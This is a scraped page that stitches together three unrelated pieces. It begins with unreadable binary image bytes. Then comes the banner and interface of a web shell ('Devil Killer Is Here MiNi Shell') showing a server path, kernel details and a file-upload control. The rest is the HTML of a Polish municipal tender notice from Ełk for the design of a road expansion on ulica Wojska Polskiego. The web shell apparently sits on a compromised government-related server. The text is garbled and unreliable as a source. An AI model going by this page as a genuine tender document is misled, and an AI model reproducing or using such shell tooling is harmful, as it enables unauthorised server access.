JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250506/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250506/0021736001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> PROJEKT ROZBUDOWY ULICY WOJSKA POLSKIEGO NA ODCINKU<br/>OD ULICY MICKIEWICZA DO SKRZYŻOWANIA ULIC SIKORSKIEGO,<br/>11-GO LISTOPADA I KAJKI W EŁKU </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasto Ełk</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 790671076</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Marsz. Józefa Piłsudskiego 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ełk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">19-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL623 - Ełcki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@um.elk.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.elk.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> PROJEKT ROZBUDOWY ULICY WOJSKA POLSKIEGO NA ODCINKU<br/>OD ULICY MICKIEWICZA DO SKRZYŻOWANIA ULIC SIKORSKIEGO,<br/>11-GO LISTOPADA I KAJKI W EŁKU </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3b9c835e-2bda-48d2-8055-0b27fb565d75</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00217360</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00013595/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Dokumentacja projektowa ul. Wojska Polskiego na odcinku od ul. Mickiewicza do ul. Sikorskiego, Kajki i 11 Listopada w Ełku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-3b9c835e-2bda-48d2-8055-0b27fb565d75 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się przy użyciu E-Zamówień, który dostępny jest pod adresem: https://ezamowienia.gov.pl/, oraz poczty<br/>elektronicznej – um@um.elk.pl.<br/>1.2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu<br/>»Wykonawca« na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki<br/>korzystania z Platformy e-Zamówienia określa »Regulamin Platformy e-Zamówienia«, dostępny na stronie internetowej<br/>https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce »Centrum Pomocy«. (...)</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Sposób sporządzenia dokumentów<br/>elektronicznych musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz<br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452)<br/>oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych<br/>oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>a) Administratorem Pani/Pana danych osobowych przetwarzanych w Urzędzie Miasta Ełku jest Prezydent Miasta Ełku, ul. Marsz. J. Piłsudskiego 4, 19-300 Ełk;<br/>b) jeśli ma Pani/Pan pytania dotyczące sposobu i zakresu przetwarzania Pani/Pana danych osobowych w zakresie działania Urzędu Miasta Ełku, a także przysługujących Pani/Panu uprawnień, może się Pani/Pan skontaktować się z Inspektorem Ochrony Danych Osobowych w Urzędzie Miasta Ełku za pomocą adresu e-mail: dpo@um.elk.pl ;<br/>c) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego PROJEKT ROZBUDOWY ULICY WOJSKA POLSKIEGO NA ODCINKU OD ULICY MICKIEWICZA DO SKRZYŻOWANIA ULIC SIKORSKIEGO, 11-GO LISTOPADA I KAJKI W EŁKU<br/>nr sprawy: O-ZP.271.16.2025, prowadzonym w trybie podstawowym;<br/>d) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o przepisy z dnia 11 września 2019 r. – Prawo zamówień publicznych (t.j. Dz. U. z 2021 r. poz. 1129 z późn. zm.), dalej „ustawa Pzp”;<br/>e) Pani/Pana dane osobowe będą przechowywane przez okres przechowywania dokumentacji z postępowania o udzielenie zamówienia publicznego;<br/>f) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>g) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>h) posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych *;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>i) nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">* Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku po-stępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.<br/>** W postępowaniu zabezpieczenie o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">O-ZP.271.16.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 387000 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.<br/>Przedmiot zamówienia<br/>Przedmiotem zamówienia jest opracowanie kompleksowej dokumentacji projektowej rozbudowy ulicy Wojska Polskiego w Ełku na odcinku od skrzyżowania z ulicą Mickiewicza do skrzyżowania ulic 11-go Listopada, ul. Kajki, ul. Sikorskiego wraz z przebudową tych skrzyżowań oraz skrzyżowań pomiędzy tymi ulicami. Orientacyjna długość ulicy Wojska Polskiego wraz z dojazdami wynosi ok 1400 mb. W ramach dokumentacji projektowej rozbudowy ulic należy zaprojektować kanalizację deszczową, oświetlenie uliczne, kanalizację teletechniczną, monitoring wizyjny, zieleń drogową oraz sieć wodociągową, kanalizację sanitarną, sieć gazową, sieć centralnego ogrzewania. W obszarze opracowania znajduje się uzbrojenie podziemne, którego przebudowę należy zaprojektować w razie wystąpienia kolizji na podstawie uzyskanych warunków technicznych. W załączeniu mapa z orientacyjnym obszarem objętym dokumentacją projektową (załącznik nr 1), na którym mają być zaprojektowane jezdnie wraz z niezbędnym wyposażeniem i uzbrojeniem podziemnym. Wykonawca ma dostarczyć kompletną dokumentację projektową wraz z decyzją ZRiD. W cenie oferty powinny zostać uwzględnione wszystkie koszty związane z wykonaniem kompletnej dokumentacji projektowej wraz z decyzjami, uzgodnieniami, na podstawie której można realizować roboty budowlane.<br/>1.1<br/>Zakres zamówienia obejmuje:<br/>W ramach dokumentacji projektowej należy zaprojektować:<br/>Branża drogowa:<br/>Opracowaniem należy objąć ulicę Wojska Polskiego na odcinku od skrzyżowania z ulicą Mickiewicza (wraz z tym skrzyżowaniem) do skrzyżowania ulic Sikorskiego, Kajki i 11-go Listopada wraz ze wszystkimi skrzyżowaniami ulic pomiędzy tymi skrzyżowaniami. Należy zaprojektować jezdnię główną o przekroju dwujezdniowym o dwóch pasach ruchu wraz z dodatkowymi pasami włączeń i wyłączeń, oraz pasem dzielącym o długości około 900mb plus odcinki ulic objętych przebudową skrzyżowań. Na całym odcinku rozbudowywanej ulicy należy zaprojektować chodniki, drogi dla rowerów, zatoki autobusowe oraz miejsca postojowe w niezbędnym zakresie. Inwestycję należy zaprojektować zgodnie z warunkami technicznymi wydanymi przez UM Ełk. Załączone warunki techniczne wydane przez UM Ełk (załącznik nr 5 do SWZ) oraz przez PWiK Sp.z o.o. (załącznik nr 6 do SWZ) dotyczą odcinka od ulicy Mickiewicza do ulicy Grunwaldzkiej, jednak zamówienie obejmuje również przebudowę/rozbudowę skrzyżowania ulic Sikorskiego, Kajki, 11-go Listopada. W ramach opracowania Wykonawca przedstawi do akceptacji Zamawiającemu dwie koncepcje rozwiązań projektowych skrzyżowania ulic Sikorskiego, 11-go Listopada i Kajki tj. skrzyżowanie skanalizowane z sygnalizacją świetlną oraz skrzyżowanie skanalizowane o ruchu okrężnym. Należy przeprowadzić analizę ruchu na istniejących skrzyżowaniach z pomiarem i strukturą ruchu oraz dostosować i dobrać najkorzystniejsze rozwiązanie gwarantujące najwyższą przepustowość.<br/>W załączeniu:<br/>- załącznik nr 1 do SWZ – mapa z orientacyjnym zakresem inwestycji<br/>- załącznik nr 2 do SWZ – zdezaktualizowany projekt z 2016r przedstawiający orientacyjnie zakres inwestycji.<br/>Należy zaprojektować następujące elementy uzbrojenia podziemnego branży sanitarnej:<br/>- Budowa nowej magistrali sieci wodociągowej i budowa /przebudowa przyłączy wodociągowych w zakresie kolizyjności z nowym układem drogowym w uwzględnieniu załączonych warunków gestora sieci wod-kan wraz z uzgodnieniem projektu z Użytkownikiem tj. PWiK Sp. z o.o. w Ełku, ul. Suwalska 64, 19-300 Ełk (Nr: DT.410.05.3.2024.1 z dn. 01.02.2024 r.). Zastosowane rozwiązania techniczne i materiałowe muszą być kompatybilne z wytycznymi gestora sieci.<br/>- Przebudowa sieci i przyłączy kanalizacji sanitarnej w zakresie kolizyjności z nowym układem drogowym w uwzględnieniu załączonych warunków gestora sieci wod-kan wraz z uzgodnieniem projektu z Użytkownikiem tj. PWiK Sp. z o.o. w Ełku, ul. Suwalska 64, 19-300 Ełk. (Nr: DT.410.05.3.2024.1 z dn. 01.02.2024 r.). Zastosowane rozwiązania techniczne i materiałowe muszą być kompatybilne z wytycznymi gestora sieci.<br/>- Przebudowa sieci i przyłączy kanalizacji deszczowej w zakresie kolizyjności z nowym układem drogowym w uwzględnieniu załączonych warunków zarządcy dróg wraz z uzgodnieniem projektu z Użytkownikiem tj. Urząd Miasta w Ełku – Wydział Mienia Komunalnego, ul. Piłsudskiego 4, 19-300 Ełk. (Nr: KM-D.7012.1.2024.JT z dn. 13.05.2024 r.). Zastosowane rozwiązania techniczne i materiałowe muszą być kompatybilne z wytycznymi zarządcy sieci.<br/>UWAGA! Wykonawca dokona analizy całych zlewni w obszarze opracowania a także dla bezpośrednio powiązanych układów istniejących już wylotów do Jeziora Ełckiego w ul. Jagiełły (DN1000mm) i w ul. K. Pułaskiego (DN600mm). W obliczeniach zlewni wykonawca uwzględnieni zmiany odwodnienia w aktualnie przebudowywanej ulicy Sikorskiego i dodatkowo brakującego odwodnienia ulicy Wojska Polskiego w obszarze od ul. Grunwaldzkiej do ul. K. Pułaskiego. Sugeruje się odciążyć istn. układy i uporządkować zlewnie oraz wyprowadzić dodatkowy wylot do jeziora. Sugerowana lokalizacja nowego wylotu pomiędzy Al. 1000-lecia i ul. K. Pułaskiego. Wykonanie nowego wylotu do jeziora będzie wymagało uzyskania pozwolenia wodnoprawnego.<br/>- Przebudowa sieci i przyłączy gazowych w zakresie kolizyjności z nowym układem drogowym w zakresie opracowania z uzyskaniem aktualnych warunków od gestora sieci wraz z uzgodnieniem projektu z Zarządcą sieci. Zastosowane rozwiązania techniczne i materiałowe muszą być kompatybilne z wytycznymi zarządcy sieci.<br/>- Przebudowa sieci i przyłączy ciepłowniczych w zakresie kolizyjności z nowym układem drogowym w zakresie opracowania z uzyskaniem aktualnych warunków od gestora sieci wraz z uzgodnieniem projektu z Zarządcą sieci. Zastosowane rozwiązania techniczne i materiałowe muszą być kompatybilne z wytycznymi zarządcy sieci.<br/>- Niezbędnym jest także w ramach dokumentacji, przeprowadzenie możliwej do wykonania analizy wysokościowej infrastruktury istniejącej, która może kolidować z nową niweletą drogi i w przypadku nienormatywnego przykrycia elementów infrastruktury lub ich kolizyjnego położenia, uwzględnić je w projekcie do przebudowy lub zabezpieczenia /wzmocnienia.<br/>- Sieci istniejące podlegające wyłączeniu należy przewidzieć do demontażu z wymianą gruntu lub unieczynnienia poprzez wypełnienie pianobetonem.<br/>- Wykaz niezbędnych prac dla infrastruktury istniejącej w zakresie opracowania, wymieniony w wydanych przez gestorów sieci warunkach technicznych, nie jest katalogiem zamkniętym i w przypadku wystąpienia dodatkowej kolizyjności sieci, należy ich przebudowę dodatkowo uwzględnić w projekcie.<br/>- W przypadku konieczności rozszerzenia zakresu niezbędnej przebudowy infrastruktury z powodów technologicznych, całość opracowania dokumentacji projektowej należy powiększyć do niezbędnego zakresu<br/>W ramach opracowania dokumentacji należy zaprojektować oświetlenie uliczne, kanalizację teletechniczną oraz monitoring wizyjny wg warunków wydanych przez UM Ełk.<br/>Przebudowę kolizji należy zaprojektować zgodnie z warunkami technicznymi uzyskanymi od gestorów sieci. Uzyskanie warunków technicznych na przebudowę kolizji należy do obowiązków wykonawcy dokumentacji projektowej.<br/>W związku z tym iż zamówienie będzie wymagało zmiany granic pasa drogowego, Wykonawca w kosztach sporządzenia dokumentacji projektowej uwzględni koszty projektu podziału nieruchomości niezbędnych do wywłaszczenia pod pas drogowy, które będą stanowiły załącznik do wydania decyzji ZRID.<br/>Wykonawca zobowiązany będzie do uzyskania pozytywnej opinii Zespołu Opiniującego Projekty Inwestycyjne działającego przy Urzędzie Miasta Ełku, jak również wszystkich uzgodnień, pozwoleń i decyzji administracyjnych niezbędnych do zrealizowania inwestycji.<br/><br/>W związku z tym, iż dokumentacja wykorzystana zostanie w postępowaniu o udzielenie zamówienia publicznego na wykonanie robót budowlanych, Wykonawca zobowiązany jest wykonać tę dokumentację zgodnie z wymogami, o których mowa w art. 99 - 103 ustawy z dnia 11września 2019 r. Prawo zamówień publicznych (Dz. U. z 2024r. poz. 1320 ze zm.), pod rygorem poniesienia konsekwencji finansowych (w pełnych wysokościach) z tytułu ewentualnych korekt finansowych, nałożonych na zamawiającego przez instytucje współfinansujące.<br/>W ramach opracowania wykonawca dostarczy:<br/>1) projekt budowlany –5 egz.,<br/>2) projekt techniczne – po 5 egz dla każdej branży oddzielnie,<br/>3) projekty techniczne przebudowy urządzeń kolidujących (na wszystkie branże oddzielne) – po 5 egz.,<br/>4) projekt zieleni – 5 egz.<br/>5) projekt stałej organizacji ruchu – 5 egz.,<br/>6) szczegółowe specyfikacje techniczne wykonania i odbioru robót – 3 egz.,<br/>7) przedmiary robót w rozbiciu na poszczególne branże – 2 egz,<br/>8) kosztorysy inwestorskie – 2 egz,<br/>9) zbiorcze zestawienie kosztów – 2 egz.,<br/>10) niezbędne opracowania towarzyszące: operat wodnoprawny, inwentaryzacja zieleni, badania geotechniczne, itp. – 1 egz,<br/>11) decyzję ZRiD,<br/>12) wersja elektroniczna wszystkich opracowań (wersja edytowalna i wersja pdf) na trwałym nośniku cyfrowym – 2 egz.<br/>1.2 Gwarancja – minimum 24 miesiące od daty odbioru końcowego </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">360 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Kryteria oceny ofert<br/>Wybór oferty dokonany zostanie na podstawie niżej przedstawionych kryteriów (nazwa kryterium, waga,<br/>sposób punktowania):<br/>Nazwa kryterium Waga<br/>Cena 60<br/>Gwarancja 40<br/>1.1. Kryterium Cena (Wc)<br/>Oferta z najniższą ceną otrzyma max. liczbę punktów – przy czym max liczba punktów w tym kryterium to 60 - pozostałym ofertom przyznana zostanie proporcjonalnie mniejsza liczba punktów.<br/>Sposób punktacji za cenę oferty jest następujący:<br/>Wc = Cn/Cp x 60<br/>Cn – najniższa oferowana cena<br/>Cp – cena oferty porównywanej<br/>Wc – wynik<br/>1.2. Kryterium Gwarancja (Wg)<br/>Oferta zawierająca gwarancję na przedmiot zamówienia powyżej 24 miesięcy otrzyma proporcjonalnie więcej punktów, przy czym max. liczba punktów w tym kryterium to 40 - okres oferowanej gwarancji należy określić w pełnych miesiącach.<br/>Sposób punktacji za okres gwarancji:<br/>Wg = Gp/Gn x 40<br/>Gp– okres gwarancji oferty porównywanej po odliczeniu okresu wymaganego tj. 24 miesięcy<br/>Gn – najdłuższy oferowany okres gwarancji po odliczeniu okresu wymaganego tj. 24 miesięcy<br/>Wg – wynik<br/>Uwaga: W przypadku zaoferowania przez Wykonawcę 24-miesięcznej gwarancji na przedmiot zamówienia, oferta otrzyma 0 pkt. w tym kryterium.<br/>Gwarancja udzielona na 48 miesięcy i więcej, będzie przyjęta do liczenia punktacji w tym kryterium jako 48 miesięcy.<br/>Uwaga: minimalny wymagany okres gwarancji to 24 pełnych miesięcy od daty odbioru końcowego, oferta z gwarancją poniżej 24 miesięcy będzie odrzucona jako niezgodna z treścią SWZ.<br/>2. Wynik<br/>Oferta, która uzyska największą sumę punktów w oparciu o ustalone kryteria, zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Realizacja zamówienia zostanie powierzona 